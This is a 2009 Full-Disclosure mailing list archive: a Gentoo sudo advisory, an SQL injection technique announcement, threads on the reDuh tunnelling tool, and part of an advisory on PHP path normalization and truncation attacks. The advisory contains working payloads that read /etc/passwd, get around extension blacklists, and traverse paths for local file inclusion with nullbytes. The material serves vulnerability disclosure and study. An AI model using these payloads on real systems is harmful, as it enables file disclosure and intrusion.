- - - - - - - - - - - - - - - Synopsis ======== A vulnerability in sudo may allow for privilege escalation. Background ========== sudo allows a system administrator to give users the ability to run commands as other users. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-admin/sudo < 1.7.0 >= 1.7.0 Description =========== Harald Koenig discovered that sudo incorrectly handles group specifications in Runas_Alias (and related) entries when a group is specified in the list (using %group syntax, to allow a user to run commands as any member of that group) and the user is already a member of that group. Impact ====== A local attacker could possibly run commands as an arbitrary system user (including root). Workaround ========== There is no known workaround at this time. Resolution ========== All sudo users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-admin/sudo-1.7.0" References ========== [ 1 ] CVE-2009-0034 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0034 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200902-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090206/a813fda2/attachment.bin From dani at kachakil.com Sat Feb 7 16:02:21 2009 From: dani at kachakil.com (Daniel Kachakil) Date: Sat, 7 Feb 2009 17:02:21 +0100 Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!) Message-ID: <08BED96B74184FB588ABC2C7DBA89B23@DK> Hi, I am glad to release SFX-SQLi (Select For XML SQL injection), a new SQL injection technique which allows to extract the whole information of a Microsoft SQL Server 2005/2008 database in an extremely fast and efficient way. This technique is based on the FOR XML clause, which is able to convert the content of a table into a single string, so its contents could be appended to some field injecting a subquery into a vulnerable input of a web application. In most cases, this method can dump all the contents of any table using only ONE REQUEST to the web server, without the need of any special permission on the DBMS. I have written a paper describing how the technique works and in which fundamentals it is based, and I have also developed a tool which implements this technique as a proof of concept (with the source code included). You can get them through this URL: http://www.kachakil.com/papers/SFX-SQLi-en.htm Regards, Daniel Kachakil From seclists at 126.com Sat Feb 7 16:42:57 2009 From: seclists at 126.com (seclists) Date: Sun, 8 Feb 2009 00:42:57 +0800 (CST) Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!) In-Reply-To: <08BED96B74184FB588ABC2C7DBA89B23@DK> References: <08BED96B74184FB588ABC2C7DBA89B23@DK> Message-ID: <2261092.319271234024977639.JavaMail.coremail@bj126app25.126.com> The Chinese version MSSQL Injection FOR MSSQL 2005 & 2008 can be found at http://www.pcsec.org/archives/SFX-SQLi-A-new-SQL-injection-technique-for-MSSQL-dumps-a-table-in-one-request.html ??2009-02-08?00:02:21??"Daniel?Kachakil"???????? >Hi, > >I?am?glad?to?release?SFX-SQLi?(Select?For?XML?SQL?injection),?a?new?SQL? >injection?technique?which?allows?to?extract?the?whole?information?of?a? >Microsoft?SQL?Server?2005/2008?database?in?an?extremely?fast?and?efficient? >way. > >This?technique?is?based?on?the?FOR?XML?clause,?which?is?able?to?convert?the? >content?of?a?table?into?a?single?string,?so?its?contents?could?be?appended? >to?some?field?injecting?a?subquery?into?a?vulnerable?input?of?a?web? >application.?In?most?cases,?this?method?can?dump?all?the?contents?of?any? >table?using?only?ONE?REQUEST?to?the?web?server,?without?the?need?of?any? >special?permission?on?the?DBMS. > >I?have?written?a?paper?describing?how?the?technique?works?and?in?which? >fundamentals?it?is?based,?and?I?have?also?developed?a?tool?which?implements? >this?technique?as?a?proof?of?concept?(with?the?source?code?included). > >You?can?get?them?through?this?URL: > >http://www.kachakil.com/papers/SFX-SQLi-en.htm > >Regards, >??Daniel?Kachakil? > > >_______________________________________________ >Full-Disclosure?-?We?believe?in?it. >Charter:?http://lists.grok.org.uk/full-disclosure-charter.html >Hosted?and?sponsored?by?Secunia?-?http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090208/eb669b75/attachment.html From seclists at 126.com Sat Feb 7 18:16:27 2009 From: seclists at 126.com (seclists) Date: Sun, 8 Feb 2009 02:16:27 +0800 (CST) Subject: [Full-disclosure] About reDuh Message-ID: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com> You can download reDuh Server Pages from http://www.sensepost.com/research/reDuh/.(PHP/ASP/JSP) Any one have tested the aspx & php version ? Plz try whether it work. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090208/2aeb5ed9/attachment.html From handrix at gmail.com Sat Feb 7 19:26:37 2009 From: handrix at gmail.com (Handrix) Date: Sat, 7 Feb 2009 19:26:37 +0000 Subject: [Full-disclosure] About reDuh In-Reply-To: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com> References: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com> Message-ID: Hello, Well i tried out reDuh exactly the jsp version, and it worked fine for me. Good job, Best regards, 2009/2/7 seclists > You can download reDuh Server Pages from > http://www.sensepost.com/research/reDuh/.(PHP/ASP/JSP) > Any one have tested the aspx & php version ? Plz try whether it work. > > ------------------------------ > ?????????????????????????????????? > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- Ali MEZGANI Network Engineering/Security http://securfox.blogspot.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090207/4ca64703/attachment.html From seclists at 126.com Sat Feb 7 20:08:07 2009 From: seclists at 126.com (seclists) Date: Sun, 8 Feb 2009 04:08:07 +0800 (CST) Subject: [Full-disclosure] About reDuh In-Reply-To: References: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com> Message-ID: <16764046.325181234037287426.JavaMail.coremail@bj126app25.126.com> Yes, I tried out reDuh jsp version,too, workd fine. But the aspx and php version can't work. ??2009-02-08 03:26:37??Handrix ?????? Hello, Well i tried out reDuh exactly the jsp version, and it worked fine for me. Good job, Best regards, 2009/2/7 seclists You can download reDuh Server Pages from http://www.sensepost.com/research/reDuh/.(PHP/ASP/JSP) Any one have tested the aspx & php version ? Plz try whether it work. ?????????????????????????????????? _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Ali MEZGANI Network Engineering/Security http://securfox.blogspot.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090208/c614744e/attachment.html From haroon at sensepost.com Sat Feb 7 20:45:28 2009 From: haroon at sensepost.com (Haroon Meer) Date: Sat, 7 Feb 2009 22:45:28 +0200 Subject: [Full-disclosure] About reDuh In-Reply-To: <16764046.325181234037287426.JavaMail.coremail@bj126app25.126.com> References: <3665359.322741234030587804.JavaMail.coremail@bj126app25.126.com> <16764046.325181234037287426.JavaMail.coremail@bj126app25.126.com> Message-ID: <20090207204528.GV4706@stewie.sensepost.com> Hi.. * seclists [seclists at 126.com] seemed to say: > Yes, I tried out reDuh jsp version,too, workd fine. >But the aspx and php version can't work. >??2009-02-08 03:26:37??Handrix ?????? >Well i tried out reDuh exactly the jsp version, and it worked fine for me. >Good job, Drop those SensePost guys an email at research at sensepost.com and tell them how its blowing up.. I have it on pretty good authority they would love to help.. /mh -- Haroon Meer, SensePost Information Security | http://www.sensepost.com/blog/ PGP: http://www.sensepost.com/pgp/haroon.txt | Tel: +27 83786 6637 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090207/0eb08316/attachment.bin From seclists at 126.com Sun Feb 8 00:20:10 2009 From: seclists at 126.com (seclists) Date: Sun, 8 Feb 2009 08:20:10 +0800 (CST) Subject: [Full-disclosure] About reDuh In-Reply-To: <20090207233941.GA4706@stewie.sensepost.com> References: <20090207233941.GA4706@stewie.sensepost.com> <4785957.325961234039975683.JavaMail.coremail@bj126app25.126.com> Message-ID: <30175509.329451234052410344.JavaMail.coremail@bj126app60.126.com> Thx for your kind help,bro. The jsp version of reDuh is powerful, so cool. ??2009-02-08?07:39:41??"Haroon?Meer"???????? >Hi.. > >*?seclists?[seclists at 126.com]?seemed?to?say: >>?Hi,bro >>??????Thx?For?shareing?reDuh.?I?have?download?reDuh(asp/php/jsp)??and?ReDuhClient?from?http://www.sensepost.com/research/reDuh. >>?????Then?I?have?try?it?in?my?vmware,Reduh.jsp?can?work?fine,But?ReDuh.aspx?can't. >>?????I?type?the?commond?"java?reDuhClient?192.168.8.102?80?/reDuh.aspx",?it?return?error. >>? >>[Info]Querying?remote?JSP?for?usable?remote?RPC?port >>[Error]?Tried?to?find?a?remote?RPC?port?in?the?range?42000?to?42050?but?no?attem >>pts?were?successful.?Sorry?it?didn't?work?out. >>? >>What?required?for?if?let?ReDuh.aspx?work,please? >>My?environment: >>windows?2003?Enterprise?edition?Sp2(Chinese)? >>IIS?6.0 >>ASP.NET?Version?is?2.0.50727 > >I?seem?to?recall?this?exact?error?coming?up?in?the?past,?and?having?been >resolved?by?ian at sensepost.com. > >He?will?send?you?an?email?early?next?week?with?a?little?note?on?how?to >fix?it. > >Thanks?for?using?it,?and?please?let?us?know?if?you?have?any?other >questions.. > >Thanks > >/mh > >--? >Haroon?Meer,?SensePost?Information?Security??|?????????????????????????????????????????????????????????????? >http://www.sensepost.com/blog/?????????????????????????????????????????????????????????????????????????????? >PGP:?http://www.sensepost.com/pgp/haroon.txt?|??Tel:?+27?83786?6637? -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090208/5e15fab7/attachment.html From pschmehl_lists at tx.rr.com Sun Feb 8 04:10:59 2009 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Sat, 07 Feb 2009 22:10:59 -0600 Subject: [Full-disclosure] SFX-SQLi: A new SQL injection technique for SQL Server (dumps a table in one request!) In-Reply-To: <08BED96B74184FB588ABC2C7DBA89B23@DK> References: <08BED96B74184FB588ABC2C7DBA89B23@DK> Message-ID: --On February 7, 2009 10:02:21 AM -0600 Daniel Kachakil wrote: > > I have written a paper describing how the technique works and in which > fundamentals it is based, and I have also developed a tool which > implements > this technique as a proof of concept (with the source code included). > > You can get them through this URL: > > http://www.kachakil.com/papers/SFX-SQLi-en.htm Having read your paper, I'm a bit confused about what you think the "new SQL injection technique" is that you've discovered. I understand you have determined a way to *extract* data in a more compact and efficient format, but I didn't see any new *injection* technique. IOW, the FOR XML construct isn't going to assist you in obtaining the data - only in obtaining it more efficiently. Did I miss something? Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ****************************************** WARNING: Check the headers before replying -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pkcs7-signature Size: 3822 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090207/9cd88d6d/attachment.bin From ascii at katamail.com Sun Feb 8 10:53:22 2009 From: ascii at katamail.com (ascii) Date: Sun, 08 Feb 2009 10:53:22 +0000 Subject: [Full-disclosure] PHP filesystem attack vectors Message-ID: <498EB9A2.9030206@katamail.com> PHP filesystem attack vectors Name PHP filesystem attack vectors Systems Affected PHP and PHP+Suhosin Vendor http://www.php.net/ Advisory http://www.ush.it/team/ush/hack-phpfs/phpfs_mad.txt Authors Francesco "ascii" Ongaro (ascii AT ush DOT it) Giovanni "evilaliv3" Pellerano (giovanni.pellerano AT evilaliv3 DOT org) Date 20090207 I) Introduction II) The bugs in 50 words III) PHP filesystem functions path normalization attack IV) PHP filesystem functions path normalization attack details V) PHP filesystem functions path truncation attack VI) PHP filesystem functions path truncation attack details VII) The facts VIII) POC and attack code IX) Conclusions X) References I) Introduction On Apr 07, 2008 I spoke with Kuza55 and Wisec about an attack I found some time before that was a new attack vector for filesystem functions (fopen, (include|require)[_once]?, file_(put|get)_contents, etc) for the PHP language. It was a path normalization issue and I asked them to keep it "secret" [4], this was a good idea cause my analisys was mostly incomplete and erroneous but the idea was good and the bug was real and disposable. Later on Dec 24, 2008 on sla.ckers.org barbarianbob showed a path truncation attack against PHP that is partially based on mine attack. He discovered the bugs indipendently so he deserves full credits for them and his findings were dissected partially by Pragmatk on [2] and [3]. Sadly, or luckily, only the surface of these important issues has been analyzed and that's why we at ush.it are releasing this article: to bring complete light on them and present some additional juice. II) The bugs in 50 words As previously indicated there are two different bugs, the first, the one that I discovered on April 2008 that can be used independently for some purposes and the second one, discovered by barbarianbob that uses the first one to archieve a better goal. Let's see the details. - PHP filesystem functions path normalization attack PHP normalizes / and /. in path names allowing for example /etc/passwd/ or /etc/passwd/. to be succesfully opened as a file. - PHP filesystem functions path truncation attack PHP has a path truncation issue (a badly implemented snprintf()) allowing only MAX_PATH chars to be evaluated when actually opening a file or directory. III) PHP filesystem functions path normalization attack Normally one would expect that to open a file its path must be issued correctly: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'include("/etc/passwd");' | head -n1 root:x:0:0:root:/root:/bin/bash --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- While all of us are aware that some path normalizations are normal: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ cat /etc//passwd | head -n1 root:x:0:0:root:/root:/bin/bash $ cat /etc/./passwd | head -n1 root:x:0:0:root:/root:/bin/bash --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- PHP does far more than what we are likely to expect: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- php -r 'include("/etc/passwd/");' --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- As you can see the file is succesfully included (it works with every single filesystem function of PHP that makes use of _php_stream_fopen() and similiar functions). This is also part of the vector discovered by barbarianbob, while he uses it for different purposes from what I initially thought. But with vanilla PHP (the official source tree) it will not work and you'll get an error complaining about the fact that the target is not a directory. Why? Because barbarianbob, everybody who ran it succesfully, and me in my initial disclosure [4] were using a patched PHP (for example Suhosin, both loaded as .so or "build-in", Ubuntu PHP, that is patched with Suhosin, etc). This is thanks to a deep and extensive testing and observation plus some code navigation and gdb magery with the help of evilaliv3 and Wisec. To overcome this limitation we came out with the universal path normalization vector for PHP that is not a single "/" but "/.". Well this is the case in which a single char really changes things. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- php -r 'include("/etc/passwd/.");' --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- This doesn't happen under normal circumstances. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ cat /etc/passwd/. cat: /etc/passwd/.: Not a directory $ cat /etc/passwd/ cat: /etc/passwd/: Not a directory --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- We were already aware of the fact that these "neutral" chars could be repeated many times without affecting the result. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- php -r 'include("/etc/passwd//////");' php -r 'include("/etc/passwd/./././././.");' --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- To be perfectly clear I was not aware of the path truncation issue (damn!) and the use for this vulnerability was different in my mind. If you read the discussion in [4] it was about checks. While ereg*() functions can be poisoned by nullbytes, preg_*() and string functions like substr() are binary safe. So if there is a "blacklist" or negative check you can bypass it with path normalization: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc/passwd' | head -n1 (doesn't work as expected) $ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc//passwd' | head -n1 root:x:0:0:root:/root:/bin/bash $ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc///passwd' | head -n1 root:x:0:0:root:/root:/bin/bash $ php -r 'if($argv[1]!="/etc/passwd")include($argv[1]);' '/etc/./passwd' | head -n1 root:x:0:0:root:/root:/bin/bash --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- But path normalization on PHP allows you to do something that cat(1) can't. To explain this a better example is needed, first let's see what would happen if only "classic" path normalization was possible: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc/passwd' | head -n1 (doesn't work as expected) $ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc//passwd' | head -n1 (doesn't work as expected, cause it still ends in passwd) $ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc/./passwd' | head -n1 (doesn't work as expected, cause it still ends in passwd) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- A check like this can't be directly bypassed (it could be if the attacker was able to create a link to /etc/passwd for example) but the need of this level of access becomes useless using the trailing "/" or "/." attack vector that we are presenting: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'if(substr($argv[1], -6, 6)!="passwd")include($argv[1]);' '/etc/passwd/.' | head -n1 root:x:0:0:root:/root:/bin/bash <- WORKS! --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Now that the usefulness of this path normalization issue, specific to PHP, is clear, it's time for a more concrete example: bypassing blacklist file extension checking. The case is of a code equivalent to the following (for example an online file editor script). --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.txt' ciccio.txt $ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.php' (doesn't work as expected because the extension is blacklisted) --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Instead, using our attack vector, the check is bypassed (and the filesystem function will normalize the path in a way that the attack will succeed): --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.php/' ciccio.php/ $ php -r 'if(substr($argv[1], -4, 4)!=".php")echo($argv[1])."\n";' 'ciccio.php/.' ciccio.php/. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Thanks to the discussion with kuza55, evilaliv3 and Wisec, 3 main uses of this attack vector were identified: - Blacklist bypass on write functions (file editors, file writing, etc) - Blacklist bypass on read functions (source disclosure, etc) - Regular expressions and IDS/IPS signature evasion The wrong assumption was that this behaviour was filesystem dependent, as said it turned out to be dependent on witch PHP version (patched VS non-patched) was installed. Kuza55 also remembered that blacklist based editors and uploads can be evaded anyway by uploading ".php.xyz" files (thanks to the Apache mod_mime mapping feature [6] necessary for mod_negotiation's Multiviews) but that's another story. IV) PHP filesystem functions path normalization attack details >From first empirical tests we discovered that the universal path normalization is "/.", these tests were lately expanded with deeper analysis of the PHP source code. PHP defines some stream wrapper functions and makes them available for use by higher level functions like include, require, require_once, file_get_contents, fopen and others. In this paper only include/require behaviours are going to be analyzed. The code analysis started with a simple breakpoint on open calls: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ gdb /usr/bin/php (gdb) break open Function "open" not defined. Make breakpoint pending on future shared library load? (y or [n]) y Breakpoint 1 (open) pending. (gdb) r -r '@include("/etc/passwd/.");' Starting program: /usr/bin/php -r '@include("/etc/passwd/.");' [..] [Switching to Thread 0xb7f2e6c0 (LWP 7264)] Breakpoint 1, 0x41606820 in open () from /lib/libpthread.so.0 (gdb) bt #0 0x41606820 in open () from /lib/libpthread.so.0 #1 0x082142c7 in _php_stream_fopen () #2 0xbff4c8cc in ?? () #3 0x09d20050 in ?? () #4 0x0000003b in ?? () #5 0x085e2504 in php_stream_stdio_ops () #6 0x00000000 in ?? () --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- _php_stream_fopen(), defined in main/plain_wrapper.c, was a good function to start the code analysis with as it was containing this interesting code: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- streams/plain_wrapper.c-893: if ((realpath = expand_filepath(filename, NULL TSRMLS_CC)) == NULL) { --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- The attention was then directed to the expand_filepath() function, defined in main/fopen_wrappers.c, and finally to expand_filepath_ex(), defined in the same file, witch was also containing the snprintf cause of the path truncation that will be discussed in the next chapter. After some raw (eg: printf+gdb) debug of expand_filepath_ex() the faulty function was finally identified: virtual_file_ex(). --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- main/fopen_wrappers.c-656: if (virtual_file_ex(&new_state, filepath, NULL, CWD_FILEPATH)) { main/fopen_wrappers.c-657: free(new_state.cwd); main/fopen_wrappers.c-658: return NULL; main/fopen_wrappers.c-659: } --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Yeah! virtual_file_ex() is the faulty function! It's defined at line 482 of SRM/tsrm_virtual_cwd.c Let's see where the error is. The interesting part of the function is at line 619 of TSRM/tsrm_virtual_cwd.c --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- TSRM/tsrm_virtual_cwd.c-619: tok=NULL; TSRM/tsrm_virtual_cwd.c-620: ptr = tsrm_strtok_r(path_copy, TOKENIZER_STRING, &tok); TSRM/tsrm_virtual_cwd.c-621: while (ptr) { TSRM/tsrm_virtual_cwd.c-622: ptr_length = strlen(ptr); [..] TSRM/tsrm_virtual_cwd.c-624: if (IS_DIRECTORY_UP(ptr, ptr_length)) { [..] TSRM/tsrm_virtual_cwd.c-651: } else if (!IS_DIRECTORY_CURRENT(ptr, ptr_length)) { [..] TSRM/tsrm_virtual_cwd.c-717: } TSRM/tsrm_virtual_cwd.c-718: ptr = tsrm_strtok_r(NULL, TOKENIZER_STRING, &tok); TSRM/tsrm_virtual_cwd.c-719: } --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- TOKENIZER_STRING, IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined in other points in the source: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ grep "#define TOKENIZER" */* -n TSRM/tsrm_virtual_cwd.c-82:#define TOKENIZER_STRING "/\\" TSRM/tsrm_virtual_cwd.c-103:#define TOKENIZER_STRING "/\\" TSRM/tsrm_virtual_cwd.c-106:#define TOKENIZER_STRING "/" --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- The define at line 82 is for WIN32, the one at line 103 is for NETWARE, the last is for all the other systems. The functions IS_DIRECTORY_UP and IS_DIRECTORY_CURRENT are defined as below. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ grep -P "#define (IS_DIRECTORY_UP *\(|IS_DIRECTORY_CURRENT *\()" */* -n -C2 | head -6 TSRM/tsrm_virtual_cwd.c-91:#define IS_DIRECTORY_UP(element, len) \ TSRM/tsrm_virtual_cwd.c-92: (len >= 2 && !php_check_dots(element, len)) [..] TSRM/tsrm_virtual_cwd.c-94:#define IS_DIRECTORY_CURRENT(element, len) \ TSRM/tsrm_virtual_cwd.c-95: (len == 1 && element[0] == '.') --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Although the code is simple to understand, here are the reasons of the normalization error: The if/else-if construct does not contemplate a failure of both cases and tsrm_strtok_r() will split the path at every "/". Then it analyzes every splitted string, returning false for all the condition statements with the effect that at every "while" cycle all the checks are ignored. This is why "./" is "neutral" and will not appear in the normalized path. The analysis for "/." is identical. Now it remains to see why, using the Suhosin patch, a sequence of "/" becomes a working attack vector. We have done our tests using suhosin-patch-5.2.8 [7]. In the patch, at line 34, there is a definition of a new php_realpath() function, and at line 1746, a "#define realpath php_realpath". So the patch replaces the entire vanilla realpath() function with this own implementation. This function, called by the virtual_file_ex() at line 561, does some checks on the path and returns a resolved path. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- TSRM/tsrm_virtual_cwd.c-561: if (!realpath(path, resolved_path)) { TSRM/tsrm_virtual_cwd.c-562: if (use_realpath == CWD_REALPATH) { TSRM/tsrm_virtual_cwd.c-563: return 1; TSRM/tsrm_virtual_cwd.c-564: } TSRM/tsrm_virtual_cwd.c-565: goto no_realpath; TSRM/tsrm_virtual_cwd.c-566: } --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Let's compare the behaviuor with and without Suhosin patch with the testcase: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'include("/etc/passwd/////////");' --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- With vanilla sources the function realpath() returns false and the code jumps to no_realpath using a goto statement: PHP will use the real path (just the path variable without any change) instead of the resolved path. This means that "/etc/passwd////////////" will be used and the testcase will fail with: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Warning: include(/etc/passwd////////////): failed to open stream: Not a directory --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- Instead, using Suhosin patched sources the function returns true, so it will use resolved_path of suhosin's realpath() function that will normalize the string to "/etc/passwd". Suhosin chooses to remove trailing "/" and that's a dangerous error (it does not prevent the "/." vector from working and opens another hole). V) PHP filesystem functions path truncation attack The attack disclosed by barbarianbob is really amazing and makes a different use of the previously presented vector (path normalization). He discovered in [1] that the path is "truncated" at a certain point. This is really amazing because it means that when including a filename longer than a certain length only the first part, the one that fits the buffer, will reach the real syscalls. Why is this of help? Think of a code similiar to the following: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- The attacker can control the central part of the included filename, since there is a fixed prefix RFI (Remote File Inclusion) cannot be performed (since it would require a protocol/uri handler to be provided to PHP plus the relatively new php.ini directives "allow_url_fopen" and "allow_url_include" on "On"). Commonly this can be exploited with a path traversal attack trying to include an attacker's controlled .php file (and this requires some sort of ability to control/create the target file, including its filename). --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- For example: ?library=../../../home/www.uploadsite_on_shared_hosting.tld/www/static/attack Will evaluate to: include("includes/../../../home/www.uploadsite_on_shared_hosting.tld/www/static/attack.php"); --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- This is not a common situation, especially when doing LFI2RCE attacks as shown in [5] (Local File Inclusion to Remote Code Execution attacks are when a LFI can be automatically exploited into an RCE finding a way to put an attacker controlled payload on the target filesystem in an existing file, like a logfile, and then including it). Normally to mount a succesfull LFI attack the attacker must control the end of the path, since filesystem functions in PHP normally are not binary safe a nullbyte can be used. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- For example: ?library=../../../var/log/something.log%00 Will evaluate to: include("includes/".urldecode("../../../var/log/something.log%00").".php"); That is equivalent to: include("includes/../../../var/log/something.log"); --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- The common problem with this is that magic_quotes escape nullbytes as addslashes() is implicitly called on all GPC and SERVER inputs. --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- $ php -r 'echo addslashes(chr(0));' \0 That evaluates to something like: $ php -r 'echo ("includes/".addslashes(urldecode("../../../var/log/something.log%00")).".php");' includes/../../../var/log/something.log\0.php --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- As a side note magic_quotes_gpc will be removed in the upcoming PHP 6 release. Now let's come back to the path truncation, what if there's the possibility to make the appended string slip out of the buffer? This doesn't happen for the C language nullbyte string termination as incorrectly said in [2] and [3] but for the following code: --8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<-- # grep "snprintf(trypath, MAXPATHLEN, \"%s/%s\", ptr, filename);" * -R main/streams/plain_wrapper.c: snprintf(trypath, MAXPATHLEN, "%s/%s", ptr, filename); main/fopen_wrappers.c: 